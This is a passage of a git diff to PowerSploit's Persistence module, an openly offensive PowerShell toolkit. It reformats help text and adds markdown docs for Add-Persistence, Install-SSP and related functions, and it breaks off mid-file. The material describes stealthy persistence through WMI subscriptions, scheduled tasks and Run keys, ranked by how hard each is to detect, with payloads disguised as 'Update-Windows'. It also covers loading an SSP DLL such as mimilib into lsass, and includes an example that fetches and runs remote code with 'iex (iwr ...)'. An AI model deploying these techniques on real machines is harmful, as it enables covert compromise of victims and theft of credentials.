This option will be the most difficult to detect and remove. +Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove. - Detection Difficulty: Difficult - Removal Difficulty: Difficult - User Detectable? No +Detection Difficulty: Difficult +Removal Difficulty: Difficult +User Detectable? No .PARAMETER ScheduledTask - Persist via a scheduled task. +Persist via a scheduled task. - Detection Difficulty: Moderate - Removal Difficulty: Moderate - User Detectable? No +Detection Difficulty: Moderate +Removal Difficulty: Moderate +User Detectable? No .PARAMETER Registry - Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. +Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. - Detection Difficulty: Easy - Removal Difficulty: Easy - User Detectable? Yes +Detection Difficulty: Easy +Removal Difficulty: Easy +User Detectable? Yes .PARAMETER AtLogon - Starts the payload upon any user logon. +Starts the payload upon any user logon. .PARAMETER AtStartup - Starts the payload within 240 and 325 seconds of computer startup. +Starts the payload within 240 and 325 seconds of computer startup. .PARAMETER OnIdle - Starts the payload after one minute of idling. +Starts the payload after one minute of idling. .PARAMETER Daily - Starts the payload daily. +Starts the payload daily. .PARAMETER Hourly - Starts the payload hourly. +Starts the payload hourly. .PARAMETER At - Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. +Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. .EXAMPLE - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' +$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' .EXAMPLE - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup +$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup .EXAMPLE - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle +$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle .LINK - http://www.exploit-monday.com +http://www.exploit-monday.com #> - [CmdletBinding()] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding()] + Param ( [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] [Switch] @@ -189,68 +191,70 @@ function New-UserPersistenceOption <# .SYNOPSIS - Configure user-level persistence options for the Add-Persistence function. +Configure user-level persistence options for the Add-Persistence function. + +PowerSploit Function: New-UserPersistenceOption +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None - PowerSploit Function: New-UserPersistenceOption - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - .DESCRIPTION - New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry. +New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry. .PARAMETER ScheduledTask - Persist via a scheduled task. +Persist via a scheduled task. - Detection Difficulty: Moderate - Removal Difficulty: Moderate - User Detectable? No +Detection Difficulty: Moderate +Removal Difficulty: Moderate +User Detectable? No .PARAMETER Registry - Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. +Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. - Detection Difficulty: Easy - Removal Difficulty: Easy - User Detectable? Yes +Detection Difficulty: Easy +Removal Difficulty: Easy +User Detectable? Yes .PARAMETER AtLogon - Starts the payload upon any user logon. +Starts the payload upon any user logon. .PARAMETER OnIdle - Starts the payload after one minute of idling. +Starts the payload after one minute of idling. .PARAMETER Daily - Starts the payload daily. +Starts the payload daily. .PARAMETER Hourly - Starts the payload hourly. +Starts the payload hourly. .PARAMETER At - Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. +Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. .EXAMPLE - C:\PS> $UserOptions = New-UserPersistenceOption -Registry -AtLogon +$UserOptions = New-UserPersistenceOption -Registry -AtLogon .EXAMPLE - C:\PS> $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle +$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle .LINK - http://www.exploit-monday.com +http://www.exploit-monday.com #> - [CmdletBinding()] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding()] + Param ( [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )] [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] @@ -333,99 +337,104 @@ function Add-Persistence <# .SYNOPSIS - Add persistence capabilities to a script. +Add persistence capabilities to a script. + +PowerSploit Function: Add-Persistence +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption +Optional Dependencies: None - PowerSploit Function: Add-Persistence - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption - Optional Dependencies: None - .DESCRIPTION - Add-Persistence will add persistence capabilities to any script or scriptblock. This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted. +Add-Persistence will add persistence capabilities to any script or scriptblock. This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted. .PARAMETER ScriptBlock - Specifies a scriptblock containing your payload. +Specifies a scriptblock containing your payload. .PARAMETER FilePath - Specifies the path to your payload. +Specifies the path to your payload. .PARAMETER ElevatedPersistenceOption - Specifies the trigger for the persistent payload if the target is running elevated. - You must run New-ElevatedPersistenceOption to generate this argument. +Specifies the trigger for the persistent payload if the target is running elevated. +You must run New-ElevatedPersistenceOption to generate this argument. .PARAMETER UserPersistenceOption - Specifies the trigger for the persistent payload if the target is not running elevated. - You must run New-UserPersistenceOption to generate this argument. +Specifies the trigger for the persistent payload if the target is not running elevated. +You must run New-UserPersistenceOption to generate this argument. .PARAMETER PersistenceScriptName - Specifies the name of the function that will wrap the original payload. The default value is 'Update-Windows'. +Specifies the name of the function that will wrap the original payload. The default value is 'Update-Windows'. .PARAMETER DoNotPersistImmediately - Output only the wrapper function for the original payload. By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. it will end with 'Update-Windows -Persist'). If you are in a position where you are running in memory but want to persist at a later time, use this option. +Output only the wrapper function for the original payload. By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. it will end with 'Update-Windows -Persist'). If you are in a position where you are running in memory but want to persist at a later time, use this option. .PARAMETER PersistentScriptFilePath - Specifies the path where you would like to output the persistence script. By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory. +Specifies the path where you would like to output the persistence script. By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory. .PARAMETER RemovalScriptFilePath - Specifies the path where you would like to output a script that will remove the persistent payload. By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory. +Specifies the path where you would like to output a script that will remove the persistent payload. By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory. .PARAMETER PassThru - Outputs the contents of the persistent script to the pipeline. This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline. +Outputs the contents of the persistent script to the pipeline. This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline. .INPUTS - None +None - Add-Persistence cannot receive any input from the pipeline. +Add-Persistence cannot receive any input from the pipeline. .OUTPUTS - System.Management.Automation.ScriptBlock +System.Management.Automation.ScriptBlock - If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script. +If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script. .NOTES - When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine. +When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine. .EXAMPLE - C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' - C:\PS>$UserOptions = New-UserPersistenceOption -Registry -AtLogon - C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose +$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' +$UserOptions = New-UserPersistenceOption -Registry -AtLogon +Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose - Description - ----------- - Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. +Description +----------- +Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. .EXAMPLE - C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) } - C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle - C:\PS>$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle - C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 +$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) } +$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle +$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle +Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 - Description - ----------- - Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. The final, encoded output is finally saved to .\EncodedPersistentScript.ps1 +Description +----------- +Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. The final, encoded output is finally saved to .\EncodedPersistentScript.ps1 .LINK - http://www.exploit-monday.com +http://www.exploit-monday.com #> - - [CmdletBinding()] Param ( + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingCmdletAliases', '')] + [CmdletBinding()] + Param ( [Parameter( Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )] [ValidateNotNullOrEmpty()] [ScriptBlock] @@ -527,7 +536,6 @@ function Add-Persistence #region Initialize data - $CompressedScript = '' $UserTrigger = '' $UserTriggerRemoval = '' $ElevatedTrigger = "''" @@ -598,7 +606,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj { $ElevatedTrigger = "schtasks /Create /RU system /SC ONLOGON /TN Updater /TR " } - + 'Daily' { $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR " @@ -736,7 +744,7 @@ $ElevatedTriggerRemoval $UserTriggerRemoval "@ - + $PersistantScript | Out-File $PersistentScriptFile Write-Verbose "Persistence script written to $PersistentScriptFile" @@ -759,10 +767,10 @@ function Install-SSP Installs a security support provider (SSP) dll. -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -785,7 +793,12 @@ if you are running a 64-bit OS. In order for the SSP dll to be loaded properly into lsass, the dll must export SpLsaModeInitialize. #> - [CmdletBinding()] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingCmdletAliases', '')] + [CmdletBinding()] + Param ( [ValidateScript({Test-Path (Resolve-Path $_)})] [String] $Path @@ -811,43 +824,43 @@ into lsass, the dll must export SpLsaModeInitialize. [String] $Path ) - + # Parse PE header to see if binary was compiled 32 or 64-bit $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read) - + [Byte[]] $MZHeader = New-Object Byte[](2) $FileStream.Read($MZHeader,0,2) | Out-Null - + $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader) if ($Header -ne 'MZ') { $FileStream.Close() Throw 'Invalid PE header.' } - + # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header) $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null - + [Byte[]] $lfanew = New-Object Byte[](4) - + # Read offset to the PE Header (will be read in reverse) $FileStream.Read($lfanew,0,4) | Out-Null - $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join '')) - + $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join '')) + # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2) - + # Read compiled architecture $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null - $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '') + $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '') $FileStream.Close() - + if (($Architecture -ne '014C') -and ($Architecture -ne '8664')) { Throw 'Invalid PE header or unsupported architecture.' } - + if ($Architecture -eq '014C') { Write-Output '32-bit' @@ -875,7 +888,7 @@ into lsass, the dll must export SpLsaModeInitialize. # Get the dll filename without the extension. # This will be added to the registry. - $DllName = $Dll | % { % {($_ -split '\.')[0]} } + $DllName = $Dll | ForEach-Object { % {($_ -split '\.')[0]} } # Enumerate all of the currently installed SSPs $SecurityPackages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' | @@ -928,7 +941,8 @@ into lsass, the dll must export SpLsaModeInitialize. if ([IntPtr]::Size -eq 4) { $StructSize = 20 - } else { + } + else { $StructSize = 24 } @@ -939,7 +953,8 @@ into lsass, the dll must export SpLsaModeInitialize. try { $Result = $Secur32::AddSecurityPackage($DllName, $StructPtr) - } catch { + } + catch { $HResult = $Error[0].Exception.InnerException.HResult Write-Warning "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))" Write-Warning "Reason: $(([ComponentModel.Win32Exception] $HResult).Message)" @@ -948,34 +963,37 @@ into lsass, the dll must export SpLsaModeInitialize. if ($RuntimeSuccess) { Write-Verbose 'Installation and loading complete!' - } else { + } + else { Write-Verbose 'Installation complete! Reboot for changes to take effect.' } } -function Get-SecurityPackages +function Get-SecurityPackage { <# .SYNOPSIS Enumerates all loaded security packages (SSPs). -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION -Get-SecurityPackages is a wrapper for secur32!EnumerateSecurityPackages. +Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages. It also parses the returned SecPkgInfo struct array. .EXAMPLE -Get-SecurityPackages +Get-SecurityPackage #> - [CmdletBinding()] Param() + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [CmdletBinding()] + Param() #region P/Invoke declarations for secur32.dll $DynAssembly = New-Object System.Reflection.AssemblyName('SSPI') @@ -1084,4 +1102,4 @@ Get-SecurityPackages $SecPackage } -} \ No newline at end of file +} diff --git a/docs/Persistence/Add-Persistence.md b/docs/Persistence/Add-Persistence.md new file mode 100755 index 0000000..bdd14fb --- /dev/null +++ b/docs/Persistence/Add-Persistence.md @@ -0,0 +1,227 @@ +# Add-Persistence + +## SYNOPSIS +Add persistence capabilities to a script. + +PowerSploit Function: Add-Persistence +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption +Optional Dependencies: None + +## SYNTAX + +### ScriptBlock +``` +Add-Persistence -ScriptBlock -ElevatedPersistenceOption -UserPersistenceOption + [-PersistenceScriptName ] [-PersistentScriptFilePath ] [-RemovalScriptFilePath ] + [-DoNotPersistImmediately] [-PassThru] +``` + +### FilePath +``` +Add-Persistence -FilePath -ElevatedPersistenceOption -UserPersistenceOption + [-PersistenceScriptName ] [-PersistentScriptFilePath ] [-RemovalScriptFilePath ] + [-DoNotPersistImmediately] [-PassThru] +``` + +## DESCRIPTION +Add-Persistence will add persistence capabilities to any script or scriptblock. +This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' +``` + +$UserOptions = New-UserPersistenceOption -Registry -AtLogon +Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose + +Description +----------- +Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. +elevated) determined at runtime. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) } +``` + +$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle +$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle +Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 + +Description +----------- +Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. +elevated) determined at runtime. +The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. +The final, encoded output is finally saved to .\EncodedPersistentScript.ps1 + +## PARAMETERS + +### -ScriptBlock +Specifies a scriptblock containing your payload. + +```yaml +Type: ScriptBlock +Parameter Sets: ScriptBlock +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -FilePath +Specifies the path to your payload. + +```yaml +Type: String +Parameter Sets: FilePath +Aliases: Path + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ElevatedPersistenceOption +Specifies the trigger for the persistent payload if the target is running elevated. +You must run New-ElevatedPersistenceOption to generate this argument. + +```yaml +Type: Object +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserPersistenceOption +Specifies the trigger for the persistent payload if the target is not running elevated. +You must run New-UserPersistenceOption to generate this argument. + +```yaml +Type: Object +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PersistenceScriptName +Specifies the name of the function that will wrap the original payload. +The default value is 'Update-Windows'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Update-Windows +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PersistentScriptFilePath +Specifies the path where you would like to output the persistence script. +By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: "$PWD\Persistence.ps1" +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RemovalScriptFilePath +Specifies the path where you would like to output a script that will remove the persistent payload. +By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: "$PWD\RemovePersistence.ps1" +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DoNotPersistImmediately +Output only the wrapper function for the original payload. +By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. +it will end with 'Update-Windows -Persist'). +If you are in a position where you are running in memory but want to persist at a later time, use this option. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PassThru +Outputs the contents of the persistent script to the pipeline. +This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### None + +Add-Persistence cannot receive any input from the pipeline. + +## OUTPUTS + +### System.Management.Automation.ScriptBlock + +If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script. + +## NOTES +When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine. + +## RELATED LINKS + +[http://www.exploit-monday.com](http://www.exploit-monday.com) + diff --git a/docs/Persistence/Get-SecurityPackage.md b/docs/Persistence/Get-SecurityPackage.md new file mode 100755 index 0000000..2a0cdef --- /dev/null +++ b/docs/Persistence/Get-SecurityPackage.md @@ -0,0 +1,37 @@ +# Get-SecurityPackage + +## SYNOPSIS +Enumerates all loaded security packages (SSPs). + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Get-SecurityPackage +``` + +## DESCRIPTION +Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages. +It also parses the returned SecPkgInfo struct array. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-SecurityPackage +``` + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Persistence/Install-SSP.md b/docs/Persistence/Install-SSP.md new file mode 100755 index 0000000..99193c0 --- /dev/null +++ b/docs/Persistence/Install-SSP.md @@ -0,0 +1,60 @@ +# Install-SSP + +## SYNOPSIS +Installs a security support provider (SSP) dll. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Install-SSP [[-Path] ] +``` + +## DESCRIPTION +Install-SSP installs an SSP dll. +Installation involves copying the dll to +%windir%\System32 and adding the name of the dll to +HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Install-SSP -Path .\mimilib.dll +``` + +## PARAMETERS + +### -Path +{{Fill Path Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +The SSP dll must match the OS architecture. +i.e. +You must have a 64-bit SSP dll +if you are running a 64-bit OS. +In order for the SSP dll to be loaded properly +into lsass, the dll must export SpLsaModeInitialize. + +## RELATED LINKS + diff --git a/docs/Persistence/New-ElevatedPersistenceOption.md b/docs/Persistence/New-ElevatedPersistenceOption.md new file mode 100755 index 0000000..efe215d --- /dev/null +++ b/docs/Persistence/New-ElevatedPersistenceOption.md @@ -0,0 +1,235 @@ +# New-ElevatedPersistenceOption + +## SYNOPSIS +Configure elevated persistence options for the Add-Persistence function. + +PowerSploit Function: New-ElevatedPersistenceOption +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### PermanentWMIAtStartup +``` +New-ElevatedPersistenceOption [-PermanentWMI] [-AtStartup] +``` + +### PermanentWMIDaily +``` +New-ElevatedPersistenceOption [-PermanentWMI] [-Daily] -At +``` + +### ScheduledTaskOnIdle +``` +New-ElevatedPersistenceOption [-ScheduledTask] [-OnIdle] +``` + +### ScheduledTaskAtLogon +``` +New-ElevatedPersistenceOption [-ScheduledTask] [-AtLogon] +``` + +### ScheduledTaskHourly +``` +New-ElevatedPersistenceOption [-ScheduledTask] [-Hourly] +``` + +### ScheduledTaskDaily +``` +New-ElevatedPersistenceOption [-ScheduledTask] [-Daily] -At +``` + +### Registry +``` +New-ElevatedPersistenceOption [-Registry] [-AtLogon] +``` + +## DESCRIPTION +New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. +The output of this function is a required parameter of Add-Persistence. +Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle +``` + +## PARAMETERS + +### -PermanentWMI +Persist via a permanent WMI event subscription. +This option will be the most difficult to detect and remove. + +Detection Difficulty: Difficult +Removal Difficulty: Difficult +User Detectable? +No + +```yaml +Type: SwitchParameter +Parameter Sets: PermanentWMIAtStartup, PermanentWMIDaily +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ScheduledTask +Persist via a scheduled task. + +Detection Difficulty: Moderate +Removal Difficulty: Moderate +User Detectable? +No + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskAtLogon, ScheduledTaskHourly, ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Registry +Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. +Note: This option will briefly pop up a PowerShell console to the user. + +Detection Difficulty: Easy +Removal Difficulty: Easy +User Detectable? +Yes + +```yaml +Type: SwitchParameter +Parameter Sets: Registry +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Daily +Starts the payload daily. + +```yaml +Type: SwitchParameter +Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Hourly +Starts the payload hourly. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskHourly +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -At +Starts the payload at the specified time. +You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. + +```yaml +Type: DateTime +Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OnIdle +Starts the payload after one minute of idling. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskOnIdle +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AtLogon +Starts the payload upon any user logon. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskAtLogon, Registry +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AtStartup +Starts the payload within 240 and 325 seconds of computer startup. + +```yaml +Type: SwitchParameter +Parameter Sets: PermanentWMIAtStartup +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://www.exploit-monday.com](http://www.exploit-monday.com) + diff --git a/docs/Persistence/New-UserPersistenceOption.md b/docs/Persistence/New-UserPersistenceOption.md new file mode 100755 index 0000000..c7c020f --- /dev/null +++ b/docs/Persistence/New-UserPersistenceOption.md @@ -0,0 +1,179 @@ +# New-UserPersistenceOption + +## SYNOPSIS +Configure user-level persistence options for the Add-Persistence function. + +PowerSploit Function: New-UserPersistenceOption +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### ScheduledTaskOnIdle +``` +New-UserPersistenceOption [-ScheduledTask] [-OnIdle] +``` + +### ScheduledTaskHourly +``` +New-UserPersistenceOption [-ScheduledTask] [-Hourly] +``` + +### ScheduledTaskDaily +``` 